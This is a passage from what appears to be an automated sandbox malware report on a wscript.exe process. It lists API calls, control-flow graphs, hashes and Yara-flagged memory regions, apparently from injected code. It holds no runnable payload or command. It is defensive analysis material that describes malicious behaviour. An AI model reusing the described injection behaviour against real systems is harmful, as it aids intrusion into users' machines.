                                             • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d200ca16b7e5d84da9676828f6beec193c7832333bf064ac0c649f3577243c74
                                            • Instruction ID: 7bb5d0b11aff30bc3e1ea5a426da799a83fda902ad01c4292cc5b93e8661a5ed
                                            • Opcode Fuzzy Hash: d200ca16b7e5d84da9676828f6beec193c7832333bf064ac0c649f3577243c74
                                            • Instruction Fuzzy Hash: 9A90023160550442F2007158491474610198BD0205F65C411B0836678D8B95DA5179E2

                                             Control-flow Graph
                                             control_flow_graph 403 919080-9190c2 call 91bd40 406 9190c8-919118 call 91be10 call 90acf0 call 914e50 403->406 407 91919c-9191a2 403->407 414 919120-919131 Sleep 406->414 415 919133-919139 414->415 416 919196-91919a 414->416 417 919163-919184 call 918eb0 415->417 418 91913b-919161 call 918ca0 415->418 416->407 416->414 422 919189-91918c 417->422 418->422 422->416
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 00919128
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: a1b7492857a8a25a3984b9832b8bf1e51afe202f6f4feea2de0658650f7e27fc
                                            • Instruction ID: 3fee06c6c6faf6eac4bac7556c1c083b3f5ad9ab8dc04a8e27b2db53d52d79a2
                                            • Opcode Fuzzy Hash: a1b7492857a8a25a3984b9832b8bf1e51afe202f6f4feea2de0658650f7e27fc
                                            • Instruction Fuzzy Hash: 403192B6600345BBC714DF64C885FA7B7B9FB88B00F10851DF62A5B245D634B590CBA4

                                             Control-flow Graph
                                             control_flow_graph 423 919077-91907e 424 919080-9190c2 call 91bd40 423->424 425 9190b8-9190c2 423->425 426 9190c8-919118 call 91be10 call 90acf0 call 914e50 424->426 427 91919c-9191a2 424->427 425->426 425->427 436 919120-919131 Sleep 426->436 437 919133-919139 436->437 438 919196-91919a 436->438 439 919163-919184 call 918eb0 437->439 440 91913b-919161 call 918ca0 437->440 438->427 438->436 444 919189-91918c 439->444 440->444 444->438
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 00919128
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 510424261553a1b9c7de418b5567af4783c3a207718fb0a9146054819cc32162
                                            • Instruction ID: ddce92423b06e7c776df1914110ff49eca34eba286cc5b46b2a81d45356f57c0
                                            • Opcode Fuzzy Hash: 510424261553a1b9c7de418b5567af4783c3a207718fb0a9146054819cc32162
                                            • Instruction Fuzzy Hash: 4E31D7B5604309BBC714DF64D885FA7B7B8FB48700F10841DFA196B246D774B590CBA5

                                             Control-flow Graph
                                             control_flow_graph 562 91a662-91a686 563 91a68c-91a6a1 RtlFreeHeap 562->563 564 91a687 call 91af60 562->564 564->563
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00903AF8), ref: 0091A69D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            • Opcode ID: 50b8b6e3fb2bc093772f9f7fa2b78ec8ee602d7a6e2afe77da654bec77ad4846
                                            • Instruction ID: 359524888ef00c870433ba5316ef8ee645e9d976461984bc85b852b86b2370ea
                                            • Opcode Fuzzy Hash: 50b8b6e3fb2bc093772f9f7fa2b78ec8ee602d7a6e2afe77da654bec77ad4846
                                            • Instruction Fuzzy Hash: E8E092B1200104BFDB14DFA4CC44EE73B69EF88750F118658F91C97382C531E915CAB0

                                             Control-flow Graph
                                             control_flow_graph 565 91a670-91a6a1 call 91af60 RtlFreeHeap
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00903AF8), ref: 0091A69D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID: .z`
                                            • API String ID: 3298025750-1441809116
                                            APIs
                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0090836A
                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0090838B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0090F1D2,0090F1D2,?,00000000,?,?), ref: 0091A800
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0090AD62
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0091A734
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0091A734
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0090F050,?,?,00000000), ref: 009191EC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0090F1D2,0090F1D2,?,00000000,?,?), ref: 0091A800
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0090AD62
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00914536,?,00914CAF,00914CAF,?,00914536,?,?,?,?,?,00000000,00000000,?), ref: 0091A65D
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,0090F1D2,0090F1D2,?,00000000,?,?), ref: 0091A800
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,00908D14,?), ref: 0090F6FB
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_900000_wscript.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            APIs
                                            • GetUserDefaultLCID.KERNEL32(?,?,00000000), ref: 009C5471
                                            • GetLocaleInfoW.KERNEL32(00000000,20000070,00000000,00000002,?,?,00000000), ref: 009C548F
                                            • GetModuleFileNameW.KERNEL32(?,00000104,?,?,00000000), ref: 009C54F6
                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 009C551C
                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000000), ref: 009C5535
                                            • LoadStringA.USER32(000003E9,?,00000104), ref: 009C556F
                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,00000000), ref: 009C55A7
                                            • CharNextA.USER32(?,?,?,?,?,00000000), ref: 009C55C8
                                            • memcpy.MSVCRT ref: 009C5606
                                            • strcpy_s.MSVCRT ref: 009C5620
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060,?,?,?,?,00000000), ref: 009C5635
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060,?,?,?,?,00000000), ref: 009C564F
                                            • sprintf_s.MSVCRT ref: 009C5692
                                            • CharNextA.USER32(?), ref: 009C56B6
                                            • memcpy.MSVCRT ref: 009C56F4
                                            • strcpy_s.MSVCRT ref: 009C570E
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 009C5721
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 009C573B
                                            • GetUserDefaultLCID.KERNEL32(?,?,?,?,00000000), ref: 009C574B
                                            • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,?,?,00000000), ref: 009C5764
                                            • sprintf_s.MSVCRT ref: 009C578A
                                            • CharNextA.USER32(?), ref: 009C57AE
                                            • memcpy.MSVCRT ref: 009C57EC
                                            • strcpy_s.MSVCRT ref: 009C5804
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 009C5817
                                            • LoadLibraryExA.KERNEL32(?,00000000,00000060), ref: 009C582D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: LibraryLoad$CharInfoLocaleNextmemcpystrcpy_s$DefaultFileModuleNameUsersprintf_s$FreeString
                                            • String ID: %s%s.DLL
                                            • API String ID: 2133840635-4110387156
                                            APIs
                                            • FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,009C2B68,00000000,00000000,00000104,?,?,00000000,00000000,?,009C2B68,?), ref: 009BB55A
                                            • LocalAlloc.KERNEL32(00000000,00000016,?,009C2B68,?), ref: 009BB56B
                                            • GetLastError.KERNEL32(?,009C2B68,?), ref: 009BB578
                                            • swprintf_s.MSVCRT ref: 009BB59F
                                            • FormatMessageA.KERNEL32(000011FF,00000000,00000000,00000000,?,00000000,00000000,00000104,?,?,00000000,00000000,?,009C2B68,?), ref: 009BB5B6
                                            • LocalAlloc.KERNEL32(00000000,0000000B,?,009C2B68,?), ref: 009BB5C3
                                            • sprintf_s.MSVCRT ref: 009BB5D9
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,009C2B68,?), ref: 009BB5EB
                                            • LocalAlloc.KERNEL32(00000000,00000000,?,009C2B68,?), ref: 009BB5FC
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,009C2B68,?), ref: 009BB616
                                            • SysAllocString.OLEAUT32(009C2B68), ref: 009BB627
                                            • LocalFree.KERNEL32(00000000,?,009C2B68), ref: 009BB638
                                            • LocalFree.KERNEL32(00000000), ref: 009BB647
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Local$Alloc$ByteCharFormatFreeMessageMultiWide$ErrorLastStringsprintf_sswprintf_s
                                            • String ID: 0x%8X$0x%8X
                                            • API String ID: 1583499379-4147741067
                                            APIs
                                              • Part of subcall function 009C5846: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows Script Host\Settings,00000000,00020019,009B8FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74,?,00000000,?,00000000), ref: 009C5873
                                              • Part of subcall function 009C5846: WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,00000000,00000000,00000000,00000000,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74), ref: 009C589D
                                              • Part of subcall function 009C5846: GetLastError.KERNEL32(?,00000000,00000000,00000000,?,009BBB74,?,00000000,?,00000000,?,?,?,009B8FB7,00000000,00000000), ref: 009C58AA
                                              • Part of subcall function 009C5846: __alloca_probe_16.LIBCMT ref: 009C58B4
                                              • Part of subcall function 009C5846: WideCharToMultiByte.KERNEL32(00000000,00000000,Software\Microsoft\Windows Script Host\Settings,000000FF,?,00000000,00000000,00000000,?,009BBB74,?,00000000,?,00000000), ref: 009C58C8
                                              • Part of subcall function 009C5846: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,009B8FB7,Software\Microsoft\Windows Script Host\Settings,00000000,00000000,80000001,80000001,?,009BBB74,?,00000000,?,00000000), ref: 009C58DF
                                            • RegisterEventSourceW.ADVAPI32(00000000,Windows Script Host), ref: 009BB9C5
                                            • GetUserNameW.ADVAPI32(?,00000100), ref: 009BB9E7
                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 009BBA16
                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 009BBA7E
                                            • ReportEventW.ADVAPI32(?,00000008,00000000,00FF03E9,00000000,00000001,00000000,?,00000000), ref: 009BBAE5
                                            • DeregisterEventSource.ADVAPI32(?), ref: 009BBAF1
                                            • SysFreeString.OLEAUT32(00000000), ref: 009BBB0E
                                            • RegCloseKey.ADVAPI32(00000000,?,Software\Microsoft\Windows Script Host\Settings,00000000,00000000), ref: 009BBB26
                                            • RegCloseKey.ADVAPI32(00000000,?,Software\Microsoft\Windows Script Host\Settings,00000000,00000000), ref: 009BBB3B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: EventName$AccountByteCharCloseLookupMultiOpenSourceWide$DeregisterErrorFreeLastRegisterReportStringUser__alloca_probe_16
                                            • String ID: LogSecurityFailures$LogSecuritySuccesses$Software\Microsoft\Windows Script Host\Settings$Windows Script Host
                                            • API String ID: 1647329903-2261343319
                                            APIs
                                            • SysAllocString.OLEAUT32(009B3AF4), ref: 009B91FF
                                            • GetVersionExA.KERNEL32(?,00000000,009B10C4,00000000), ref: 009B923F
                                            • IsTextUnicode.ADVAPI32(?,?,?), ref: 009B926F
                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 009B9345
                                            • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,?,?,?,00000000,00000000,00000000,009B10C4,00000000), ref: 009B9372
                                            • GetLastError.KERNEL32(?,?,00000000,?,?,?,00000000,00000000,00000000,009B10C4,00000000), ref: 009B937C
                                            • SysFreeString.OLEAUT32(00000000), ref: 009B93EC
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: String$Alloc$ByteCharErrorFreeLastMultiTextUnicodeVersionWide
                                            • String ID:
                                            • API String ID: 1844124450-0
                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 009C79CD
                                            • GetCurrentProcessId.KERNEL32 ref: 009C79DC
                                            • GetCurrentThreadId.KERNEL32 ref: 009C79E5
                                            • GetTickCount.KERNEL32 ref: 009C79EE
                                            • QueryPerformanceCounter.KERNEL32(?), ref: 009C7A03
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                            • String ID:
                                            • API String ID: 1445889803-0
                                            • Opcode ID: 89034a16d4e2ec863c3c56852d5b66c3f34b310446f1e77d3d7a31bb80dc34be
                                            • Instruction ID: 6388cf642dca8f45000082682ab3002253687f2edd0fad871662d3d7e9976b3c
                                            • Opcode Fuzzy Hash: 89034a16d4e2ec863c3c56852d5b66c3f34b310446f1e77d3d7a31bb80dc34be
                                            • Instruction Fuzzy Hash: 45110A71D28108EFCB10DBB9DA48A9EB7F8FF48314F550459D406E7250EB309A00DB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: WScript.CreateObject
                                            • API String ID: 0-1366894974
                                            • Opcode ID: ec0dd1ed487ba7677276cdebb51291f3b705ce5a2fa3f57efc7993dbbcc894f3
                                            • Instruction ID: 7ecbd3d688240f0f7b60cbc73d034c2f66e27ffd0aa277b639f517702ab90c26
                                            • Opcode Fuzzy Hash: ec0dd1ed487ba7677276cdebb51291f3b705ce5a2fa3f57efc7993dbbcc894f3
                                            • Instruction Fuzzy Hash: C5C1BC75A182029FC704DF24D895F2A77E9AFC9724F14442DF956873A2DB34EC02CB9A
                                            APIs
                                            • CLSIDFromProgID.OLE32(?,?), ref: 009C090E
                                            • CoCreateInstance.OLE32(?,00000000,00000015,009B3860,?), ref: 009C0998
                                              • Part of subcall function 009BB1AA: CreateErrorInfo.OLEAUT32(00000A2C,?,?,?,?,009B73FB,009B3A24,WSHRemote.Execute,00000A2C), ref: 009BB1C7
                                              • Part of subcall function 009BB1AA: SysFreeString.OLEAUT32(009B3A24), ref: 009BB36D
                                              • Part of subcall function 009BB1AA: SysFreeString.OLEAUT32(009B73FB), ref: 009BB376
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CreateFreeString$ErrorFromInfoInstanceProg
                                            • String ID: WScript.CreateObject
                                            • API String ID: 3168253046-1366894974
                                            • Opcode ID: 5a2e8cebc0eee225f26e374054db10d7592b18f68154860ded7df73fb5acb89e
                                            • Instruction ID: 7d45a821cd7910f7f39b20ba7ed3bc1e18a3973575e06ccccef22b4219293017
                                            • Opcode Fuzzy Hash: 5a2e8cebc0eee225f26e374054db10d7592b18f68154860ded7df73fb5acb89e
                                            • Instruction Fuzzy Hash: 3011B136E40229FBEF115B88CD06FED7A259BD0734F108128FD046A2C3D6B1AE5097C2
                                            APIs
                                            • FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000,00000000,009C6DAD,00000000,00000000,009C6FF4,00000000,00000000,00000000,?,00000000,?), ref: 009C6D84
                                            • LoadResource.KERNEL32(00000000,00000000), ref: 009C6D92
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoad
                                            • String ID: MUI
                                            • API String ID: 2619053042-1339004836
                                            • Opcode ID: b5fae171e14f3aa1e85a2fc88e41e20e3517dd914c45215b8cfc71edb7dec2e4
                                            • Instruction ID: ee9af1a3cb46a0b16ad70eba32514437070911ba0c5553b979ed0620ba510ca4
                                            • Opcode Fuzzy Hash: b5fae171e14f3aa1e85a2fc88e41e20e3517dd914c45215b8cfc71edb7dec2e4
                                            • Instruction Fuzzy Hash: 3FD01231B4D2217AE62027157C0EFDB2A1DCB81775F050085F405950D1DB915C829295
                                            APIs
                                            • CreateBindCtx.OLE32(00000000,?), ref: 009B9DCE
                                            • SysFreeString.OLEAUT32(00000000), ref: 009B9E84
                                            • SysAllocStringByteLen.OLEAUT32(00000000,?), ref: 009B9EEE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: String$AllocBindByteCreateFree
                                            • String ID:
                                            • API String ID: 3716443497-0
                                            • Opcode ID: a07e543bcdeb430c4b16fd8b58553b5c25ab295b49ea970b182a46d1e69e079b
                                            • Instruction ID: 5142cec9cc1cc2d424c97ad0761a5a938fe5d34897de76d1e2bfdba10bddde88
                                            • Opcode Fuzzy Hash: a07e543bcdeb430c4b16fd8b58553b5c25ab295b49ea970b182a46d1e69e079b
                                            • Instruction Fuzzy Hash: 01515E71A24719DFDB10CF95D984A9DBBB9FF88724F21012DE606AB351CB75AC01CB80
                                            APIs
                                            • GetLocaleInfoW.KERNEL32(00000404,00000008,?,00000020,00000000), ref: 009C70A9
                                            • wcsncmp.MSVCRT(?,009B4540,00000003), ref: 009C70BE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: InfoLocalewcsncmp
                                            • String ID:
                                            • API String ID: 4128031126-0
                                            • Opcode ID: d6f7e53c186edb3149cf7395cacd62e2d61108bbff30ffa05399c6a35c026907
                                            • Instruction ID: 59a9d2a6001082e1896d560342d42c4904166a1b077e507624f544b781262682
                                            • Opcode Fuzzy Hash: d6f7e53c186edb3149cf7395cacd62e2d61108bbff30ffa05399c6a35c026907
                                            • Instruction Fuzzy Hash: 3DF027B1F542086BE710DBB59C0AFAEB3ECAB40B04F440124BA15E72C0EA70EE05D769
                                            APIs
                                            • GetProcessHeap.KERNEL32(00000000,?,009B7D2F), ref: 009C51C6
                                            • HeapFree.KERNEL32(00000000), ref: 009C51CD
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            • Opcode ID: 1e61f7f47a5a59258d0e49c4eb1e25a2099983a0b4f8c6d79480c034c4a21a81
                                            • Instruction ID: e600a1632f2b6a7a852cf7646eec668e58a9a41ea37935c761322ad8ea74485d
                                            • Opcode Fuzzy Hash: 1e61f7f47a5a59258d0e49c4eb1e25a2099983a0b4f8c6d79480c034c4a21a81
                                            • Instruction Fuzzy Hash: 1EC04830818200EBEF429BB4EC0CF553A2ABB06306F290098A50A880B0C6764090EB12
                                            APIs
                                            • CoGetMalloc.OLE32(00000001,?,00000000,00000000,?), ref: 009B8A04
                                            • LoadRegTypeLib.OLEAUT32(009B39F4,00000001,00000000,00000000,?), ref: 009B8A24
                                            • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 009B8A78
                                            • StringFromCLSID.OLE32(?,?), ref: 009B8AA2
                                            • SysFreeString.OLEAUT32(?), ref: 009B8C1A
                                            • StringFromCLSID.OLE32(?,?), ref: 009B8C71
                                            • SysStringLen.OLEAUT32(?), ref: 009B8CDB
                                            • sprintf_s.MSVCRT ref: 009B8D04
                                            • RegOpenKeyA.ADVAPI32(?,?,?), ref: 009B8D1E
                                            • RegQueryValueA.ADVAPI32(?,Version,?,?), ref: 009B8D4D
                                            • RegDeleteKeyA.ADVAPI32(?,LocalServer32), ref: 009B8D7B
                                            • RegDeleteKeyA.ADVAPI32(?,TypeLib), ref: 009B8D8C
                                            • RegDeleteKeyA.ADVAPI32(?,Version), ref: 009B8D99
                                            • RegDeleteKeyA.ADVAPI32(?,ProgID), ref: 009B8DAA
                                            • RegCloseKey.ADVAPI32(?), ref: 009B8DB6
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 009B8DC6
                                            • RegOpenKeyA.ADVAPI32(80000000,00000000,?), ref: 009B8DDA
                                            • RegDeleteKeyA.ADVAPI32(?,CLSID), ref: 009B8DEF
                                            • RegCloseKey.ADVAPI32(?), ref: 009B8DFB
                                            • RegDeleteKeyA.ADVAPI32(80000000,00000000), ref: 009B8E03
                                            • RegCloseKey.ADVAPI32(?), ref: 009B8E11
                                            • UnRegisterTypeLib.OLEAUT32(009B39F4,00000001,00000000,00000000,00000001), ref: 009B8E3D
                                            • RegCloseKey.ADVAPI32(00000000), ref: 009B8F44
                                            • SysFreeString.OLEAUT32(?), ref: 009B8F50
                                            Strings
                                            Memory Dump Source
